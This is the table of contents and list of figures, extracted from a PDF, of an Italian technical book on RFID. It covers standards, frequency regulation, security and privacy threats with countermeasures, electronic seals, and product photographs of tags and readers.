VI.1.4 La normativa ISO ed EPCglobal . . . . . . . . . . . . . . . . . 287VI.1.5 Standard EPCglobal e loro evoluzione . . . . . . . . . . . . 289VI.1.6 La normativa globale ISO/IEC 18000 . . . . . . . . . . . . . 291V.1.7 I TAG UHF Gen2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 292

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 18

Page 16: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

19 SOMMARIO

PARTE VII - ALLOCAZIONE IN FREQUENZA . . . . . . . . . . . . . . . . . . . 301VII.1 Normativa mondiale . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .303

VII.1.1 Situazione nelle bande di frequenza LF ed HF . . . . . .305VII.1.2 Situazione nelle bande di frequenza in UHF

media: organismi territoriali . . . . . . . . . . . . . . . . . . . . . .3051.2.1 Normativa mondiale delle bande UHF . . . . . . . .306

VII.2 Normativa europea . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .308VII.2.1 ERC/REC 70-03 - Annesso 9 “Inductive applications” 310VII.2.2 ERC/REC 70-03 - Annesso 1 “Non-specific

short range devices” . . . . . . . . . . . . . . . . . . . . . . . . . . . .313VII.2.3 ERC/REC 70-03 - Annesso 11 “Radio frequency

identification applications” . . . . . . . . . . . . . . . . . . . . . . .316VII.2.4 La Decisione della Commissione Europea

sulle bande UHF per RFID . . . . . . . . . . . . . . . . . . . . . .318VII.2.5 La Decisione della Commissione Europea

sulle bande per SRD . . . . . . . . . . . . . . . . . . . . . . . . . . . . .320VII.2.6 Decisioni dell’European Radiocommunications

Committee . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .325VII.2.7 Standard ETSI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .326

VII.3 Normativa nazionale . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .327VII.3.1 Principali bande RFID nazionali . . . . . . . . . . . . . . . . . .328

3.1.1 Bande in LF (9kHz - 135 kHz) . . . . . . . . . . . . . .3283.1.2 Banda in HF (centrata su 13,56 MHz) . . . . . . . .3293.1.3 Bande in UHF media (865÷870 MHz) . . . . . . . .331

VII.3.2 Esempi di bande in cui sono consentiti SRDper uso non specifico . . . . . . . . . . . . . . . . . . . . . . . . . . .3333.2.1 Banda UHF bassa (433÷435 MHz) . . . . . . . . . . .3333.2.2 Banda 2,4 GHz (UHF alta) . . . . . . . . . . . . . . . . .3333.2.3 Banda 5,8 GHz (SHF) . . . . . . . . . . . . . . . . . . . . .334

VII.3.3 Sperimentazioni Ultra Wide Band - Banda 6÷8,5 GHz .335

PARTE VIII - SICUREZZA & PRIVACY NEI SISTEMI RFID . . . . . . . . . . 339VIII.1 Incipit: gli albori della sicurezza . . . . . . . . . . . . . . . . . . . . . . .341VIII.2 Minacce alla sicurezza (threat) nei sistemi RFID . . . . . . . . . .341

1-40.qxp:RFID 9-09-2008 15:21 Pagina 19

Page 17: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

20 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

VIII.2.1 Sniffing (Intercettazioni, Analisi e Clonazione) . . . . . .3422.1.1 Intercettazioni (Eavesdropping) . . . . . . . . . . . . . .3432.1.2 Clonazione nei TAG . . . . . . . . . . . . . . . . . . . . . . .345

VIII.2.2 Denial of service (rifiuto del servizio) . . . . . . . . . . . . .3482.2.1 Blocker TAG . . . . . . . . . . . . . . . . . . . . . . . . . . . . .348

VIII.2.3 TAG Tampering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .349VIII.2.4 Data Spoofing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .350

2.4.1 Data Corruption . . . . . . . . . . . . . . . . . . . . . . . . . .3502.4.2 Data Modification . . . . . . . . . . . . . . . . . . . . . . . . .3512.4.3 Data Insertion (Inserimento di falsi messaggi) . .3522.4.4 Attacco del terzo estraneo

(Man-in-the-Middle-Attack) . . . . . . . . . . . . . . . . .353VIII.2.5 “Malware” (Iniezione di codice maligno) . . . . . . . . . .355

VIII.3 Sicurezza dei sistemi vs. condizioni ambientali . . . . . . . . . . . .355VIII.3.1 Propagazione in condizioni critiche & Schermature .355VIII.3.2 Disabilitazione delle antenne:

totale (Killing) o parziale (Clipping) . . . . . . . . . . . . . . .358VIII.4 Violazione della privacy (letture non autorizzate

e tracciamento illecito) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .358VIII.4.1 Difesa della Privacy . . . . . . . . . . . . . . . . . . . . . . . . . . . .362

4.1.1 Blocco della correlazione dei dati . . . . . . . . . . . . .3624.1.2 Uso di tecniche crittografiche . . . . . . . . . . . . . . . .3644.1.3 Uso di pseudonimi . . . . . . . . . . . . . . . . . . . . . . . .3654.1.4 Schermatura, disabilitazione

o eliminazione dell’antenna . . . . . . . . . . . . . . . . . .3654.1.5 Difesa attiva con Denial of service . . . . . . . . . . . .3654.1.6 Case study . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .366

VIII.4.2 Punti di vista istituzionali . . . . . . . . . . . . . . . . . . . . . . .3664.2.1 La Raccomandazione della Commissione UE

sulla privacy nei sistemi RFID . . . . . . . . . . . . . .371VIII.4.3Conclusioni sulla privacy . . . . . . . . . . . . . . . . . . . . . . . .375

VIII.5 Tecniche crittografiche di sicurezza nei sistemi RFID . . . . . .375VIII.5.1 Autenticazione passiva – Validazione dei dati . . . . . . .376

5.1.1 Funzioni hash . . . . . . . . . . . . . . . . . . . . . . . . . . . .3765.1.2 Firma digitale . . . . . . . . . . . . . . . . . . . . . . . . . . . .377

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 20

Page 18: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

21 SOMMARIO

VIII.5.2 Autenticazione attiva . . . . . . . . . . . . . . . . . . . . . . . . . .3785.2.1 Mutual symmetrical keys . . . . . . . . . . . . . . . . . . .3795.2.2 Derived keys . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3815.2.3 Autenticazione attraverso

“Physical Unclonable Function” . . . . . . . . . . . . .3825.2.4 Una proposta per lo scambio di chiavi . . . . . . . .3835.2.5 TAG a Chiave Simmetrica . . . . . . . . . . . . . . . . . .385

VIII.5.3 Criptazione dei dati – Allestimento di un“Canale Sicuro” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .386

VIII.5.4 Sicurezza nei TAG Gen2 . . . . . . . . . . . . . . . . . . . . . . .388VIII.6 Sommario delle contromisure . . . . . . . . . . . . . . . . . . . . . . . . . .389VIII.7 eSeal – Sigilli elettronici . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .391

VIII.7.1 Attacchi alla sicurezza della supply chain . . . . . . . . . .391VIII.7.2 Introduzione ai Sigilli elettronici . . . . . . . . . . . . . . . . .392

7.2.1 Funzioni di un sigillo . . . . . . . . . . . . . . . . . . . . . .3937.2.2 Le norme ISO sui sigilli . . . . . . . . . . . . . . . . . . . .394

VIII.7.3 Tecnologie per i sigilli . . . . . . . . . . . . . . . . . . . . . . . . . .3947.3.1 Ruolo della tecnologia RFID . . . . . . . . . . . . . . . .396

VIII.7.4 Sigillo passivo a singolo TAG . . . . . . . . . . . . . . . . . . . .397VIII.7.5 Sigillo passivo a doppio TAG . . . . . . . . . . . . . . . . . . . .398VIII.7.6 Sigillo multi-TAG . . . . . . . . . . . . . . . . . . . . . . . . . . . . .399

7.6.1 Field test: il “Lithuanian corridor” . . . . . . . . . . .400VIII.7.7 Sigilli attivi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .400VIII.7.8 Conclusioni sugli eSeal . . . . . . . . . . . . . . . . . . . . . . . . .401

PARTE IX - APPENDICI E BIBLIOGRAFIA . . . . . . . . . . . . . . . . . . . . . . 403IX.1 Appendice A – Potenze di emissione a RF:

ERP vs. EIRP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .405IX.2 Appendice B – Identificativi delle merci:

EPC vs. Codice a barre . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .405IX.2.1 Il codice EPC (Electronic Product Code) . . . . . . . . . . .405IX.2.2 I Codici a barre . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .407

2.2.1 Codici a barre monodimensionali . . . . . . . . . . . .4072.2.2 Codici a barre bidimensionali . . . . . . . . . . . . . . .408

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 21

Page 19: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

IX.2.3 EPC vs. Codici a barre . . . . . . . . . . . . . . . . . . . . . . . . . . 413IX.3 Appendice C – Funzioni hash crittografiche . . . . . . . . . . . . . .417

IX.3.1 Lista delle comuni funzioni hash . . . . . . . . . . . . . . . . .419IX.4 Appendice D – Compendio degli standard EPCglobal,

ISO ed ECMA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .422IX.4.1 Norme EPCglobal . . . . . . . . . . . . . . . . . . . . . . . . . . . .422

4.1.1 EPCglobal Specifications . . . . . . . . . . . . . . . . .4224.1.2 Ratified EPCglobal Standards . . . . . . . . . . . . .423

IX.4.2 Standard ISO su tecniche di sicurezza . . . . . . . . . . . .424IX.4.3 Standard ISO su identificazione di animali . . . . . . . .427IX.4.4 Carte elettroniche senza contatto . . . . . . . . . . . . . . . .428

4.4.1 Integrated circuit(s) cards . . . . . . . . . . . . . . . .4284.4.2 Close-coupled cards . . . . . . . . . . . . . . . . . . . . .4304.4.3 Proximity cards . . . . . . . . . . . . . . . . . . . . . . . . .4304.4.4 Vicinity cards . . . . . . . . . . . . . . . . . . . . . . . . . . .4314.4.5 Standard proprietari per carte senza contatto 432

IX.4.5 ISO/ECMA normative su NFC . . . . . . . . . . . . . . . . . .432IX.4.6 ISO normativa su RFID . . . . . . . . . . . . . . . . . . . . . . . .435IX.4.7 ISO normativa su applicazioni degli RFID . . . . . . . . .440IX.4.8 ISO norme sui sigilli elettronici . . . . . . . . . . . . . . . . . .441IX.4.9 Altre normative su applicazioni degli RFID . . . . . . . .442IX.4.10 Standard ECMA su UWB (Multi Band OFDM) . . . .442

IX.5 Bibliografia . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .444IX.5.1 Riferimenti per tecnologia RFID(esclusi standard ISO, EPCglobal. ECMA, ecc.) . . . . . . . . . . .444IX.5.2 Riferimenti per allocazione in frequenza . . . . . . . . . . .454

5.2.1 Riferimenti generali . . . . . . . . . . . . . . . . . . . . . .4545.2.2 Decisioni ERC . . . . . . . . . . . . . . . . . . . . . . . . . .4555.2.3 Decisioni della Commissione Europea per

riordino frequenze e recepimento italiano . . .4575.2.4 Standard ETSI . . . . . . . . . . . . . . . . . . . . . . . . .4575.2.5 Riferimenti per UWB (FCC, ITU-r, CEPT,

escluso Dec ERC) . . . . . . . . . . . . . . . . . . . . . .4585.2.6 Raccomandazione e Direttive europee

su Privacy e Conformità . . . . . . . . . . . . . . . . .459

RFID - Fondamenti di una tecnologia silenziosamente pervasiva22

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 22

Page 20: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

SOMMARIO23

ELENCO DELLE FIGURE

Figura I.1: Sistema RFID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44Figura I.2: TAG passivo a bassa frequenza (HF) . . . . . . . . . . . . . . . . . .45Figura I.3: TAG UHF “Square Squiggle” per piccoli oggettidimensioni 23mmx 23mm - Alien tecnology . . . . . . . . . . . . . . . . . . . . . .45Figura I.4: TAG attivo per bassa frequenza (LF) 32K di memoriariscrivibile, uso in presenza di metalli - EMS - gruppo Datalogic (Italia) .45Figura I.5: TAG UHF attivo i-Q8 S per usi industriali; possibileapplicazione su carrello - Identec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .45Figura I.6: TAG semi passivo per uso in etichette, l’applicazioneè resa possibile per l’uso di una batteria estremamente sottile eflessibile che consente al TAG di transitare attraverso stampantidi etichette; il protocollo di comunicazione è compatibile con iTAG passivi GEN2 ) - Power ID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .46Figura I.7: TAG semi attivo con sensore di temperatura . . . . . . . . . . .46Figura I.8: TAG passivo UHF “Butterfly” montato come“etichetta intelligente” adesiva su carta - UPM Raflatac . . . . . . . . . . . .48Figura I.9: Vari modelli di Reader - Symbol Technologies - da sinistra adestra: RD5000 Mobile RFID Reader, XR440 Fixed RFID Reader indu-strial class, Gen 2, MC9090-G RFID Handheld Mobile Reader, Writerand bar code Reader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .49Figura I.10: Vari modelli di antenne per Reader -Symbol Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .50Figura I.11: Esempio di Reader con antenne a “Portale” per la lettura dioggetti in transito − dc600 Gate UHF − Symbol Technologies . . . . . . .50Figura I.12: Differenti livelli di identificazione . . . . . . . . . . . . . . . . . . .51Figura I.13: RFID nella catena di distribuzione . . . . . . . . . . . . . . . . . . .52Figura I.14: Mini TAG HF UPM Raflatac -Copyright Metro Future Store . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .52Figura I.15: TAG HF - LAB ID (Italia) . . . . . . . . . . . . . . . . . . . . . . . . .54Figura I.16: Esempi di TAG UHF Gen2 . . . . . . . . . . . . . . . . . . . . . . . .54Figura I.17: A sinistra, TAG per uso animale: in ceramica da inserirenello stomaco dei bovini . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .63Figura I.18: Car Immobilizer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .63

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 23

Page 21: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

24 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

Figura I.19: Le forme assunte dai trasponditori HFsono le più varie e sono disponibili per coprire diverse applicazioni . .64Figura I.20: “Etichetta intelligente” adesiva e stampabile,incorpora TAG in banda HF - LAB ID (Italia) . . . . . . . . . . . . . . . . . . .64Figura I.21: TAG passivi HF per Smart Card -EMS Escort Memory Systems - gruppo Datalogic (Italia) . . . . . . . . . . .65Figura I.22: TAG UHF passivo “MiniDipole” - Intermec Inc. . . . . . . .66Figura I.23: “Etichetta intelligente” con codice a barre evarie informazioni stampate, incorpora TAG in banda UHF -Zebra Technologies Inc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .66Figura I.24: TAG passivo, banda 2,4 GHz, dimensioni 30x 6 mm,in contenitore rigido per uso in aria libera - Intermec Inc. . . . . . . . . .67Figura I.25: Classificazione dei TAGper Standard/Frequenze/Applicazioni . . . . . . . . . . . . . . . . . . . . . . . . ..68Figura I.26: Tipologie di applicazioni NFC . . . . . . . . . . . . . . . . . . . . . .72Figura I.27: NFC + telefonino; “Il tocco magico” . . . . . . . . . . . . . . . . .73Figura I.28: Confronto tra caratteristiche di TAG Passivi, Semi Passivi,Attivi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .78Figura I.29: Comparazione dimensioni di memoria/funzionalitàdel TAG [Klaus Finkenzeller, “RFID Handbook: Fundamentalsand Applications in Contactless Smart Cards and Identification,Second Edition”, WILEY 2003] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .78Figura I.30: Distribuzione dei sistemi RFID realizzati nelle diversefrequenze , a sinistra i sistemi operanti nel 2008, a destra i progettisviluppati a livello mondiale negli ultimi anni. . . . . . . . . . . . . . . . . . . . .79Figura I.31: Previsione sul costo dei TAG passivinegli anni 2005 ÷2015; Fonte: IDTechEx (2005); citata in [46] . . . . . .80Figura I.32: Ripartizione dei costi di produzione di TAG passivi UHF(elettromagnetici) a basso costo (del tipo “etichette intelligenti”) . . . .81Figura I.33: Ripartizione dei costi di produzione di TAG passiviHF (induttivi) a basso costo (del tipo “etichette intelligenti”) . . . . . . .81Figura I.34: Previsione sul numero di TAG in circolazionenegli anni 2005 ÷2015; Fonte: IDTechEx (2005); citata in [46] . . . . . . .85Figura I.35: Prospettive di investimento mondiali nei settori dellatecnologiaRFID Fonte: “RFID Forecasts, Players and Opportunities 2008-

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 24

Page 22: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

25 SOMMARIO

2018” (www.IDTechEx.com) dati presentati al convegno TraceID aMilano Aprile 2008 [169], le percentuali in figura sono solo indicative86Figura I.36: Stime del mercato mondiale RFID in miliardi,secondo [52] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .86Figura I.37: Stime del mercato europeo RFID in miliardi,secondo [52] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .87Figura I.38: “Hit Parade” dei fattori ostativiper le applicazioni RFID, da [54]) . . . . . . . . . . . . . . . . . . . . . . . . . . . . .89Figura I.39: stime dei maggiori fattori di costo diun’applicazione RFID secondo Soreon Research citato da [52] . . . . . .90Figura I.40: PolyIC Model of a polymer flexible RFID TAG . . . . . . . .92Figura II.1: Tag-it™ passivo in banda HF 13,56 Mhz, antennain alluminio 45 x 45 mm, 256 kByte di memoria, standardISO/IEC 15693-2,-3; ISO/IEC 18000-3, adatto all’assemblaggioin carta o PVC ed applicazioni di identificazione oggetti,catalogazione libri, biglietti elettronici - Texas Instruments . . . . . . . . .95Figura II.2: Schema a blocchi generale di TAG passivi [4] . . . . . . . . .95Figura II.3: A927- TAG semi passivo in banda UHF 870÷915 MHz,conforme a ISO 18000-6B, batteria 3 anni, con sensore ditemperatura, 128 + 128 Byte di memoria, applicazioniTemperature Logger per medicinali e merci deperibili -CAEN S.p.A. Costruzioni Apparecchiature ElettronicheNucleari, Viareggio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .96Figura II.4: TAG attivo in banda UHF 869,4÷869,65 Mhz,dimensioni 87 x 50 x 7 mm, per uso in logistica - Identec Solution . . .97Figura II.5: TAG UHF attivo i-Q32 con sonda esterna e“data-logger” di temperatura − Identec . . . . . . . . . . . . . . . . . . . . . . . . .98Figura II.6: TAG attivo in banda UHF per uso in logistica conintegrazione a bordo di un GPS . Il dato GPS (coordinategeoreferenziali) è scritto periodicamente in memoria . . . . . . . . . . . . . .98Figura II.7: Accoppiamento induttivo (campo vicino)bande LF & HF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .100Figura II.8: Accoppiamento elettromagnetico (campo lontano) UHF100Figura II.9: Processo di assemblaggio nei TAG incorporati inetichette e smart card [4]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .102

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 25

Page 23: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

26 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

Figura II.10: Flusso di produzione di TAG passivi (smart label, RFIDtickets ecc.) – Fonte: Muehlbauer AG . . . . . . . . . . . . . . . . . . . . . . . . 103Figura II.11: Panoramica di TAG in rotoli, dopo il processo diproduzione INLAY, pronti per essere incorporati in etichette conil processo Label & contactless card production (cfr. Figura 2 10) . .103Figura II.12: Flusso di produzione di TAG passivi, i processi“Chip to strap” e “Strap to antenna”– Fonte: Muehlbauer AG . . . . .104Figura II.13: Un esempio di “Strap” . . . . . . . . . . . . . . . . . . . . . . . . . .105Figura II.14: ipotesi tecnica di separazione tra chip su modulo edipolo radiante . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .106Figura II.15: Chip RFID assemblati tramite Flip Chip Process. . . . . .106Figura II.16: Esempi di differenti tipi di connesione del chip tramite isolder bumpsFonte: Flip-Chip Technology;http://extra.ivf.se/ngl/documents/ChapterB/ChapterB1.pdf . . . . . . .107Figura II.17: Processo di assemblaggio del Chip RFID con l’usodi adesivi del tipo ACF o di ACP . . . . . . . . . . . . . . . . . . . . . . . . . . . . .107Figura II.18: Processo di assemblaggio del Chip RFID con l’usodi adesivi del tipo NCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .108Figura II.19: Fasi tipiche del Flip Chip Process, dal prelievo deldispositivo dal wafer al posizionamento sull’antenna. . . . . . . . . . . . . .108Figura II.20: Microfotografia di un chip di TAG HF montatosull’antenne a spira con processo Flip-chip . . . . . . . . . . . . . . . . . . . . .108Figura II.21: Antenne di TAG HF (13,56 MHz) [4] per etichetteflessibili con antenna in alluminio − Inside Contactless . . . . . . . . . . .109Figura II.22: Schema di principio di un TAG LF e realizzazionecommerciale, vedi anche fig. I.17 – ENSID Technologies . . . . . . . . . .109Figura II.23: Antenna in filo di rame . . . . . . . . . . . . . . . . . . . . . . . . . .110Figura II.24: Antenne di TAG HF (13,56 MHz) [4] per etichette di cartacon antenne in inchiostro conduttivo all’argento − ASK (Francia). . .110Figura II.25: Antenne ad inchiostro conduttivo . . . . . . . . . . . . . . . . .110Figura II.26: TAG UHF con antenna a dipolo λ/2,lunghezza ≈16 cm - Alien Technology . . . . . . . . . . . . . . . . . . . . . . . . .112Figura II.27: TAG UHF “Butterfly” Class1 UHF; con antenna adipolo λ/4 in rame, dimensioni 76x76 mm - UPM Raflatac . . . . . . . .112Figura II.28: TAG UHF “Squiggle” Gen 2 disponibile per diversi

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 26

Page 24: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

27 SOMMARIO

package inclusi prodotti contenenti metallo o acqua, antenna a dipoloλ/4, dimensioni 97mm x 11mm – Alien Technology . . . . . . . . . . . . .112Figura II.29: TAG passivo, banda dei 2,4 GHz,dimensioni 30x 6 mm - Intermec Inc. . . . . . . . . . . . . . . . . . . . . . . . . . .112Figura II.30: TAG con antenne ortogonali -Matrics / Symbol Technology. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .112Figura II.31: TAG UHF “2x2”, Omnidirezionale, progettato perapplicazioni controllo bagagli ed equipaggiamenti negli aeroporti,dimensioni 47 x 42 mm, il relativo diagramma di radiazione è statoillustrato in Figura III.19– Alien Technology. . . . . . . . . . . . . . . . . . . .112Figura II.32: Componenti principali di un'antenna stampata . . . . . . .114Figura II.33: Crossover o ponte in un TAGinduttivo – LAB ID (Italia) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .114Figura II.34: Crossover o ponte . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .114Figura II.35: Esempi di antenne a filo in diversi formati. . . . . . . . . . .115Figura II.36: Tecnica ad incisione (INLAY). . . . . . . . . . . . . . . . . . . . .116Figura II.37: Tecnica a filo (INLAY-LESS). . . . . . . . . . . . . . . . . . . . . .116Figura II.38: Confronto tra antenne; si noti che, a parità di numerodi spire, in antenne a filo (a destra) si possono ottenere avvolgimentipiù vicini e, conseguentemente efficienze di area maggiori rispetto adantenne tradizionali (a sinistra).. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .117Figura II.39: TAG ad accoppiamento induttivo per l’uso inbraccialetti o collari monouso non manomettibili . . . . . . . . . . . . . . . .117Figura II.40: Esempio TAG IntelliSense con antennadual-band e sensori . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .119Figura II.41: Esempio di antenna dual-band platform PIFA con antennaa spira integrate. Vista 3D (a sinistra) e planare (a destra) . . . . . . . . .119Figura II.42: Confronto dimensionale tra un tradizionale TAG UHF(“Squiggle” Gen 2 – Alien Technology – cfr, Figura II.31) di dimensioni97mm x 11mm ed un TAG UHF Gen 2 con accoppiamento induttivo diprossimità, di diametro 9 mm – Impinj Inc. . . . . . . . . . . . . . . . . . . . . .121Figura II.43: Diversi TAG UHF ad accoppiamento induttivo(gli oggetti colorati all’interno del contenitore) che lavorano(in campo vicino) totalmente immersi in un liquido all’interno diuna boccetta – Impinj Inc. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .121

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 27

Page 25: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

28 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

Figura II.44: Esempio di TAG UHF GEN 2 con doppia antenna peraccoppiamento elettromagnetico (in campo lontano) ed induttivo(in campo vicino) – Impinj Inc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .122Figura II.45: Nastri di TAG UHF GEN 2, per l’assemblamento inetichette, con doppia antenna (a sinistra) e con antenna a singola spira peraccoppiamento induttivo (a destra) – Impinj Inc. . . . . . . . . . . . . . . . . 122Figura II.46: Selezione di antenne HF - Escort Memory System. . . . .123Figura II.47: Selezione di antenne UHF - Symbol Technology . . . . . .123Figura II.48: Reader portatile con lettore/scrittore UHF –Intermec IP3_APP4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .123Figura II.49: Esempi di antenne HF a polarizzazione circolare,montate su muletto per movimentazione pallet - Intermec Inc. . . . . .123Figura II.50: Esempi di antenne HF a “Portale” per carico merci . . .124Figura II.51: Reader HF su nastro trasportatore, sistema a tunnel -EMS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .124Figura II.52: Sistema a portale EMS . . . . . . . . . . . . . . . . . . . . . . . . .124Figura II.53: Esempio di Portale ALX-9010 per TAG UHF Gen2,con vista interna – Alien technology. . . . . . . . . . . . . . . . . . . . . . . . . . .124Figura II.54: Piattaforma rotante, schema di funzionamento erealizzazione Symbol. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .124Figura II.55: Campo ad una dimensione [4]. . . . . . . . . . . . . . . . . . . . .126Figura II.56: Campo a due dimensioni [4]. . . . . . . . . . . . . . . . . . . . . .126Figura II.57: Campo a tre dimensioni [4]. . . . . . . . . . . . . . . . . . . . . . .126Figura II.58: Reader fisso in banda HF (SAMSYS). . . . . . . . . . . . . . .127Figura II.59: Reader fisso da portale A948EU con supportodi 4 antenne in banda UHF (compatibile Gen2) -CAEN S.p.A., Viareggio.. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .127Figura II.60: Famiglia di Reader portatili dell’ultima generazione –PSION TEKLOGIX – Workabout Pro C ed S – Sistemamodulare che può operare su TAG UHF, HF, LF e carte Mifare,comunica via WLAN e monta sistemi operativi Window . . . . . . . . . .127Figura II.61: Schema a blocchi semplificato di un tipicoReader omodina. A partire da un oscillatore locale la portanteè modulata e trasmessa al TAG[7] . . . . . . . . . . . . . . . . . . . . . . . . . . . .128Figura II.62: Biglietto elettronico . . . . . . . . . . . . . . . . . . . . . . . . . . . . .133

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 28

Page 26: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

29 SOMMARIO

Figura II.63: Biglietti della metropolitana di Mosca −UPM Raflatac . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .133Figura II.64: TAG HF per PosteItaliane -EMS (Escort Memory Systems) - gruppo Datalogic (Italia) . . . . . . . .133Figura II.65: Etichette flessibili HF –EMS (Escort Memory Systems) - gruppo Datalogic (Italia) . . . . . . . .133Figura II.66: TAG su cinturino da polso per applicazioni ospedaliere .134Figura II.67: TAG HF incorporato in tappo per bottiglie di vino -LAB ID (Italia). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .134Figura II.68: TAG “keytags” (chiave elettronica) -http://www.daelibs.com.au/ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .134Figura II.69: TAG HF incorporato in bullone per usoautomubilistico (Ford) - EMS (Escort Memory Systems) -gruppo Datalogic (Italia) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .134Figura II.70: Car Immobilizer (Texas Instrument) . . . . . . . . . . . . . . .134Figura II.71: TAG HF per lavanderie -EMS (Escort Memory Systems) - gruppo Datalogic (Italia) . . . . . . . .135Figura II.72: TAG per identificazione di animali; da applicaresulle orecchie di bovini; diametro 3cm . . . . . . . . . . . . . . . . . . . . . . . . .135Figura II.73: Telepass per le autostrade italiane; . . . . . . . . . . . . . . . . .135Figura II.74: TAG per identificazione di animali;da inserire nello stomaco dei bovini - tipo grande:l= 6,5 cm; diam. =2 cm; tipo piccolo: l=6,5 cm: diam.=1,5 cm . . . . . .135Figura II.75: Chip RFID con antenna incorporata (Hitachi). . . . . . . .135Figura II.76: Stampante RFID a TrasferimentoTermico -Toshiba, mentre stampa TAG UHF UPM Raflatac . . . . . . . . . . . . . . .136Figura II.77: Stampante Intermec . . . . . . . . . . . . . . . . . . . . . . . . . . . . .136Figura II.78: R110Xi Stampante HF/UHF secondo configurazione -Zebra Technologies Inc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .136Figura II.80: Logica di definizione di TAG passivi [4]. . . . . . . . . . . .137Figura II.81: Infrastruttura informativa EPCGlobal[EPCGlobal] [4] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .139Figura III.1: Frequenza di risonanza nei TAG adaccoppiamento induttivo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .143

da1a40.qxp:RFID 9-09-2008 13:27 Pagina 29

Page 27: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

30 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

